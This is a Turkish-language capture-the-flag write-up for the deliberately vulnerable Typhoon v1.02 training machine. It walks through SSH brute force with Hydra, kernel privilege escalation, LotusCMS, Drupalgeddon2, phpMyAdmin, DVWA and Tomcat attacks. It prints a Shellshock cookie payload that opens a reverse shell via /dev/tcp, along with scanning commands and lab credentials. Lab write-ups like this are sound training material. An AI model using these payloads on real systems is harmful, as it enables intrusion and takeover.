Typhoon v1.02 WriteUp
Selamlar bu yazımda PrismaCSI‘ın eğitim amaçlı hazırlamış olduğu Typhoon makinesinin çözümünden bahsedeceğim. Umarım öğretici bir yazı olur, keyifli okumalar.
Nmap
ftp’ye baktığımda herhangi bir zafiyet bulamadım. Anonymous olarak giriş yapılabiliyordu fakat faydalı bir şey yoktu.
SSH
SSH’a Hydra yardımı ile Brute Force uygulayarak olası bir kullanıcı adı ve parolası bulmaya çalıştım.
hydra -L UserList.txt -P /usr/share/wordlists/rockyou.txt 192.168.44.129 -t 20 -V ssh
SSH ile güzel bir başlangıç yaptık. Bulduğum bilgilerle giriş yapmayı denedim.
uname -a komutu ile sistem bilgilerini çektim ve biraz araştırma yaptığımda yetki yükseltme zafiyetine sahip olduğunu fark ettim.
Bulduğum exploit’i kendi makinemden hedef makineye wget yardımıyla çekerek gcc ile derleyip çalıştırdım ve root yetkisini elde ettim.
HTTP
80 portunda bir Apache server’ı çalıştığını görmüştüm, bir taraftan sayfayı kurcalarken diğer taraftan nikto ve dirb toollarını bilgi toplamaları için çalıştırdım.
dirb http://192.168.44.129 -o dirb
nikto -host http://192.168.44.129
Nikto çıktısında merak uyandırıcı birkaç bir şey buldum ve shellshock zafiyetini kurcalamaya karar verdim.
Shellshock
Bash, kendisine web uygulaması tarafından yollanan komutları da çalıştırabilmektedir ve shellshock zafiyetinin oluştuğu kısım ise bu özelliğin kötü amaçla kullanılmasıdır.
/cgi-bin/ klasörü altında bulunan dosya üzerinden bu zafiyet istismar edilebilmektedir. Burp Suite yardımıyla araya girerek isteği yakaladım ve backdoor oluşturacak zararlı kodumu Cookie’ye ekleyerek isteği yolladım.
Cookie:() { :;}; echo; /bin/bash -i >& /dev/tcp/192.168.44.128/5555 0>&1
5555 portunu dinlemeye başladım. İstismar başarıyla sonuçladı ve shell’i aldım.
ssh’da kullandığım exploit çalışmadı biraz araştırmayla Dirty COW adlı başka bir exploit buldum. Exploit’i kendi makineme indirip derlerken hata aldım fakat kullanılabilir durumdaydı bu yüzden hedef makineye çektim.
Daha sonra exploit’i çalıştırınca root yetkisini elde ettim.
robot.txt ve MongoDB
Web Crawler’ların erişmemesi için robot.txt’ye MongoDB dizini eklendiğini gördüm. Böylece MongoDB dizininden haberim oldu ve dizine gittiğimde bazı yararlı bilgilerle karşılaştım.
robot.txt –>
ıd:typhoon pw:789456123 bilgilerini kullanarak ssh servisi ile bağlandım. Daha önce kullandığım exploit burda da kullanılabilir durumdaydı ve bahsi geçen exploit yardımıyla root yetkisini aldım.
CMS
cms dizinine gittiğimde beni böyle bir ekran karşıladı.
LotusCMS hakkında biraz araştırma yaptım ve Exploit Database’de bir RCE zaafiyeti olduğunu gördüm.
Metasploit Framework kullanarak zafiyeti istismar etmeye çalıştım ve meterpreter session’nı aldım.
Daha önceki zafiyetlerde kullandığım exploit’i bu zafiyette de kullanarak root yetkisini elde ettim.
Drupal
drupal dizinine gidip sayfanın kaynağını görüntülediğimde drupal ın drupal 8 olduğunu öğrendim.
Metasploit Framework de drupal 8 için görünen exploitleri denemeye başladım ve drupal_drupalgeddon2 isimli exploit ile meterpreter session’ı aldım. Daha önce kullandığım exploit burda da işe yaradı ve root yetkisini elde ettim.
phpMyAdmin
phpMyAdmin dizini beni görseldeki login sayfası ile karşıladı. Burp Suite ile Brute Force yapmayı denedim fakat herhangi bir sonuç alamadım. Bir süre manual olarak ıd pw denedikten sonra ıd:root pw:toor bilgileri ile içeri girebildim. İçerde yok yoktu.
Calendar
phpMyAdmin içerisinde calendar için kullanılabilecek id pw buldum fakat calendar’a hiçbir şekilde erişemedim.
an0ther_fl4g_br0
DVWA
phpMyAdmin içerisinde Dvwa için kullanılan bazı önemli bilgileri buldum.
Bulduğum hash’i decrypt etmek için hashcat kullanmaya çalıştım fakat cevap alamadım. Online bir decrypt sayfasını kullanarak parolayı buldum.
Daha sonra DVWA ya girerek Security kısmından güvenlik derecesini Impossible’dan Low’a düşürdüm çünkü neden yapmayayım ki ?
Vulnerability : File Upload sekmesine geldim ve bir webshell bularak buradan yükleme işlemini gerçekleştirdim.
Web shell dosyası içerisinde kendi ip mi ve kendim belirlediğim portu yazdım.
Belirlediğim portu dinlemeye başladım ve upload gerçekleştikten sonra bize gösterilen endpoint’e giderek shell’i aldım. Daha sonra Shelshock zafiyeti için kullandığım exploit yardımıyla root yetkisine ulaştım.
Apache Tomcat/Coyote JPS engine 1.1
Metasploit Framework da bulunan tomcat_mgr_login modülü ile 8080 portunda bulunan Tomcat servisinin login bilgilerini almaya çalıştım.
Bulmuş olduğum tomcat:tomcat bilgisi ile tomcat_mgr_upload modülünü kullanarak meterpreter shell’i elde ettim. Daha sonra privilege escalation için kullandığım exploit ile root yetkisini elde ettim.